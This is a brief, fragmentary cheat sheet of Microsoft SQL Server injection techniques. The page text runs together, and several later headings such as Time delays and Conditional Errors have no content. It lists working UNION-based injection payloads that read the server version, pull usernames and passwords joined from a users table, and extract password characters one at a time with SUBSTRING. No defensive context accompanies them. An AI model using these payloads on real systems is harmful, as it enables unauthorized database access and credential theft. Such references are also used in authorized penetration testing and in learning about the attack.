Basic Microsoft SQL injection Cheatsheet
Microsoft SQL Injection (MS SQLi)
Retrieving Database version
SELECT @@version' UNION SELECT NULL, @@version -- -String Concatenation
'string1'+'string2'SELECT username+password FROM users;' UNION SELECT NULL,username+":"+password,NULL FROM users -- -Substring
SELECT SUBSTRING(password,2,1) FROM users ' UNION SELECT SUBSTRING(password,2,1) FROM users -- -Comments
Database Contents
Conditional Errors
Time delays
Conditional Time delays
Last updated